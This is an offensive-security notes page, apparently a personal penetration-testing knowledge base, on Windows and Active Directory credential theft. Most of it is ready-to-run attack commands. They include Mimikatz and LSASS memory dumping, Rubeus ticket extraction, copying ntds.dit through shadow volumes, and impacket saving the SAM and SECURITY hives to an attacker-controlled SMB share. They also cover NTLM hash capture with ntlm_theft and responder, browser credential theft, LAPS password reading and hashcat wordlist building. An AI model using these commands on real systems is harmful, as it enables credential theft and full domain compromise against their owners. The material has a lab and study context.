Malleum Knowledge Base

7. Credential Theft

6 min read

Access Tokens

Mimikatz

NTLM hashes

This command requires elevated privileges.

sekurlsa::logonpasswords

Kerberos Encryption keys

This command requires elevated privileges.

sekurlsa::ekeys

SAM

This command requires elevated privileges.

lsadump::sam

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 2661 C:\Windows\Temp\lsass.dmp full

Domain Cached Credentials

Domain Cached Credentials (DCC) was designed for instances where domain credentials are required to logon to a machine, even whilst it’s disconnected from the domain (think of a roaming laptop for example).  The local device caches the domain credentials so authentication can happen locally, but these can be extracted and cracked offline to recover plaintext credentials.

Unfortunately, the hash format is not NTLM so it can’t be used with pass the hash.  The only viable use for these is to crack them offline.

lsadump::cache

To crack these with hashcat, we need to transform them into the expected format. The example hashes page shows us it should be $DCC2$<iterations>#<username>#<hash>.

Extracting Kerberos Tickets

Rubeus.exe triage

Each user has their own logon session, which is represented by a LUID (locally unique identifier).  In this example, we’re operating within the LUID of bfarmer, 0x14b5fa.  The WKSN-2$ machine account has its own session, 0x3e4; and jking also has a session, 0x7049f.  Tickets for the service name krbtgt are Ticket Granting Tickets (TGTs) and others are Ticket Granting Service Tickets (TGSs).

Rubeus’ dump command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS.  If not elevated, we can only pull tickets from our own session.  Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the /luid and /service parameters.

Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap

DCsync

The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers.  DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

SeBackupPrivilege

nxc smb 10.10.79.103 -u 'Caroline.Robinson' -p 'Password123' -M backup_operator

Sliver

Standalone systems

execute -o cmd /c "reg save HKLM\system system"

execute -o cmd /c "reg save HKLM\sam sam"

download sam

download system

Domain Controller

nxc smb <ip> -u username -p password -M backup_operator

jay.dsh file

set context persistent nowriters
add volume c: alias malleum
create
expose %malleum% m:


unix2dos malleum.dsh

upload malleum.dsh (C:\windows\temp)

mv se_backup_privilege.dsh C:\windows\tasks

diskshadow /s jay.dsh

robocopy /b m:\windows\ntds . ntds.dit

execute -o cmd /c "reg save HKLM\system system"

download system

download ntds.dit

secretsdump.py -system system -ntds ntds.dit LOCAL

Using impacket

sudo smbserver.py share . -smb2support

reg.py baby.vl/caroline.robinson:'Password123!'@10.10.127.198 save -keyName 'HKLM\SAM' -o '\\10.8.2.41\share\'

reg.py baby.vl/caroline.robinson:'Password123!'@10.10.127.198 save -keyName 'HKLM\SYSTEM' -o '\\10.8.2.41\share\'

reg.py baby.vl/caroline.robinson:'Password123!'@10.10.127.198 save -keyName 'HKLM\SECURITY' -o '\\10.8.2.41\share\'

Extracting the password

secretsdump.py -system system -sam sam LOCAL

With Machine Account

 getST.py -self -impersonate "Administrator" -altservice "cifs/ms01.mist.htb" -k -no-pass -dc-ip 192.168.100.100 mist.htb/'ms01$'


nxc smb MS01.mist.htb --use-kcache --lsa

Ntlm theft by uploading files on SMB share

https://github.com/Greenwolf/ntlm_theft

python3 ntlm_theft.py -g all -s 10.8.2.41 -f test

mv test* ../../vulnlab/breach

smbclient //10.10.124.219/share

mput *

hashcat hashes.txt /usr/share/wordlists/rockyou.txt

sudo responder -I tun0

NTLM Theft after uploading video file.

python3 ntlm_theft.py -g m3u,wax,asx -s 10.8.2.41 -f media

mv media* ../../vulnlab/media

Try uploading m3u, asx, wax files.

sudo responder -I tun0

DPAPI

  • After doing the privilege esacalation try this.
sharpdpapi machinetriage /showall

Here’s how it generally works:

  1. Credential Gathering:

    • The attacker must first obtain the necessary credentials or keys. This can be achieved through various means such as credential dumping, memory scraping, or stealing registry hives (e.g., SYSTEM and SECURITY hives).

  2. Registry Hive Access:

    • The attacker extracts the SYSTEM and SECURITY hives from the target machine. These hives contain the Master Keys used by DPAPI to encrypt and decrypt data.

  3. Master Key Decryption:

    • Using the credentials or keys obtained, the attacker decrypts the Master Keys stored in the registry hives.

  4. Decrypting Secrets:

    • With the Master Keys, sharpdpapi can then decrypt various DPAPI-protected secrets found on the machine. This includes browser passwords, Wi-Fi keys, and other sensitive information.

Nanodump

nanodump 572 test 1 PMDM

download test

python3 -m pypykatz lsa minidump test

SharpChrome

sharpchrome -s -- logins /browser:edge

Windows Local Credentials (Administrator)

Shared Administrator Password

  • Get Computer Name
$env:computername
  • Get SID for the Computername
[wmi] "Win32_userAccount.Domain"='client',Name='Administrator'"
  • Obtain Credential From SAM Database
  • The credential is located at C:\Windows\System32\config\SAM
  • The System has exclusive lock on it.So we can’t download even with Admin Shell
  • On Server edition you can use vss (Shadow Volume) works on 8.1 or later
wmic shadwcopy call create Volume = 'C:\'

list shadows

Now copy the SAM database file from the path provided in the output

copy $PATH C:\users\jay\Downloads\sam

It is typically encrypted with RC4 or AES.

  • Encryption keys are stored in System file so we copy the sam database
copy $PATH C:\users\jay\Downloads\system

You can also use

reg save HKLM\sam $OutputPATH

Decrypt using impacket, mimikatz,creddump7

  • Try now password reuse for other machine

Hardening Local Administrator (Group Policy Prefrences)

  • If the account is disabled (by default on 8.1 and later) this attack can be prevented.
  • But sometimes this account is required.
  • Microsoft introduced Group Policy Preferences.
  • It helps to centrally change the Administrator password.
  • In this approach the data is stored in xml file in SYSVOL shared on each computer.
  • Microsoft encrypted with aes256 but the encryption key was leaked.
  • Security update 2014, which removed the ability to add Group Policy Password but the existing containing password were not removed.
  • New approach LAPS in 2015.
  • Two new attribute ms-mcs-AdmPwdExpirationTime and ms-mcs-AdmPwd.
  • Attributes are locked

Getting cleartext password from LAPS if in use.

Import-module .\LAPSToolkit.ps1

Get-LAPSComputers
  • Find the Groups that can read the password
Find-LAPSDelegatedGroups
  • Get the members of that group (powerview)
Get-NetGroupMember -GroupName "LAPS Password Readers"
  • Typically given this rights to Server Admins or Help Desk.

Volatality

Volatility 3 Overview

Volatility 3 is an advanced memory forensics framework used to extract digital artifacts from volatile memory (RAM) dumps. It is widely used in incident response, malware analysis, and digital forensics investigations. The tool supports analysis of memory dumps from various operating systems, including Windows, Linux, and macOS.

Key Features of Volatility 3

  1. Memory Analysis: Analyze memory dumps to extract information about running processes, open network connections, loaded drivers, and more.
  2. Artifact Extraction: Retrieve various artifacts such as registry hives, files, and user credentials from memory dumps.
  3. Malware Detection: Identify malicious code and rootkits residing in memory.
  4. Cross-Platform Support: Supports memory dumps from different operating systems.

Using Volatility 3 to Extract Credentials from a Memory Dump

To use Volatility 3 to extract credentials from a memory dump, follow these steps:

  1. Download and Install Volatility 3: Ensure Volatility 3 is installed as described in the previous steps.

  2. Identify the Profile: Determine the profile of the memory dump. Volatility 3 uses “automagic” to automatically determine the profile.

  3. Run Volatility 3 Plugins: Use relevant plugins to extract credentials and other sensitive information.

Example Commands

Here’s a sequence of commands to run Volatility 3 and extract credentials:

  1. Extract Basic Information:

    python3 vol.py -f memory.dmp windows.info

  2. Extract Cached Domain Credentials:

    python3 vol.py -f memory.dmp windows.cachedump.Cachedump

  3. Extract LSA Secrets:

    python3 vol.py -f memory.dmp windows.lsadump.Lsadump

  4. Dump Hashes:

    python3 vol.py -f memory.dmp windows.hashdump.Hashdump

Generating Password

vim wordlist.txt

Spring
Fall
Autumn
Winter
Summer
Lustrous
lustrous

for i in $(cat wordlist.txt);do echo $i;echo ${i}2022;echo ${i}2023;echo ${i}2024;done > t

vim append_exclamation.rule

:
$!
$@

hashcat --force t -r append_exclamation.rule -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words.txt

Graph View

Backlinks